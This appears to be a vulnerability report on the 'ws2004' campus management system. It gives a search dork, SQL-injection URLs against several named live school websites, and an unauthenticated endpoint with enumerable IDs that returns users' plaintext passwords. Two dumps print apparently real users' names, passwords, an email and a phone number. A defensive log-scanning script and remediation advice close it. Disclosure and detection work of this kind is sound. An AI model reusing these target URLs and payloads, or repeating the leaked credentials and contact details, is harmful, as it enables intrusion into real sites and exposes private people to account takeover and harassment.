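### Brief description:
Bundled vulnerabilities
### Details:
Baidu search: inurl:ws2004
Technical support: Nanjing Suyaxing Information Technology Development Co., Ltd. (南京苏亚星资讯科技开发有限公司)
These are bundled here rather than submitted one by one.
----------------
0x01: SQL injection vulnerability
Vulnerable page: ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=
Vulnerable parameter: ID
Proof: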
1# http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106221416.jpg](https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg)
![QQ图片20150106221511.jpg](https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg)
2# http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106221603.jpg](https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg)
![QQ图片20150106221635.jpg](https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg)
3# http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106221740.jpg](https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg)
![QQ图片20150106221759.jpg](https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg)
4# http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106221945.jpg](https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg)
![QQ图片20150106222012.jpg](https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg)
5# http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106222104.jpg](https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg)
![QQ图片20150106222138.jpg](https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg)
6# http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106222306.jpg](https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg)
![QQ图片20150106222332.jpg](https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg)
7# http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*
![QQ图片20150106222500.jpg](https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg)
![QQ图片20150106222526.jpg](https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg)
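0x02: Retrieving any registered user's plaintext password
Note: this is similar to [WooYun: A campus management system design flaw allows retrieving any administrator's plaintext password (no login required)](http://www.wooyun.org/bugs/wooyun-2015-090403), but it is not the same point. This one returns registered users' information and passwords, and the IDs can be enumerated. Opening the link directly shows a blank page; use "View Source" to see the information.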
1# http://www.cgyz.net.cn/ws2004/
http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=56
```
<?xml version="1.0" encoding="GB2312"?>
<DataListAll><DataList><UserName><![CDATA[xuan]]></UserName><RealName><![CDATA[王萱]]></RealName><PassWords><![CDATA[120428]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[]]></Telephone><City><![CDATA[]]></City><Province><![CDATA[]]></Province><Country><![CDATA[]]></Country></DataList></DataListAll>
```
http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=40
http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=49
……
2# http://www.eedsyz.cn/ws2004/
http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39
```
<?xml version="1.0" encoding="GB2312"?>
<DataListAll><DataList><UserName><![CDATA[真如本性]]></UserName><RealName><![CDATA[刘真如]]></RealName><PassWords><![CDATA[liuzhenru*()21]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[1179926121@qq.com]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[15304776395]]></Telephone><City><![CDATA[东胜区]]></City><Province><![CDATA[内蒙古自治区]]></Province><Country><![CDATA[中华人民共和国]]></Country></DataList></DataListAll>
```
http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=46
http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=50
……
3# http://www.sndsx.com/ws2004/
http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=24
http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=25
http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=62
……
4# http://www.wzzx.net.cn/ws2004/
http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=11
http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39
http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=22
……
5# http://www.hwsyxx.com/ws2004/
http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=67
http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=83
http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=71
……
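
A defender-side check for the two issues above, as an added example that is not part of the original report: it scans IIS W3C-style access logs for non-numeric `ID` values sent to `add.asp` and for a single client requesting many distinct `ID`s from `editxml.asp`. The log sample, its field order, the client addresses and the alert threshold are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS W3C-style sample (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-01-06 22:14:01 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=24 200
2015-01-06 22:14:02 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=25 200
2015-01-06 22:14:03 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=26 200
2015-01-06 22:15:10 198.51.100.7 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=24 200
2015-01-06 22:16:30 203.0.113.5 GET /ws2004/SysManage/Research/DiaoChaZhuTi/add.asp ID=48* 200
2015-01-06 22:17:00 198.51.100.7 GET /ws2004/SysManage/Research/DiaoChaZhuTi/add.asp ID=48 200
"""

ENUM_PAGE = "/sysmanage/usermanage/regmanage/editxml.asp"  # path from the report
SQLI_PAGE = "/sysmanage/research/diaochazhuti/add.asp"     # path from the report
ENUM_THRESHOLD = 3  # assumed: distinct IDs per client before alerting

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def detect(text, threshold=ENUM_THRESHOLD):
    ids_by_client = defaultdict(set)
    alerts = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        query = parse_qs(rec["cs-uri-query"], keep_blank_values=True)
        # Classic ASP treats query-string parameter names case-insensitively.
        values = [v for k, vs in query.items() if k.lower() == "id" for v in vs]
        if stem.endswith(SQLI_PAGE):
            # The ID here is a record number; anything else is suspect input.
            alerts += [("non-numeric-id", rec["c-ip"], v) for v in values
                       if not (v.isascii() and v.isdigit())]
        elif stem.endswith(ENUM_PAGE):
            ids_by_client[rec["c-ip"]].update(values)
    for ip, ids in sorted(ids_by_client.items()):
        if len(ids) >= threshold:
            alerts.append(("id-enumeration", ip, len(ids)))
    return alerts
```

Detection only narrows the window; the fix is for `editxml.asp` to require an authenticated session and stop returning the `PassWords` field, and for `add.asp` to bind `ID` as a numeric parameter.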
### Proof of vulnerability: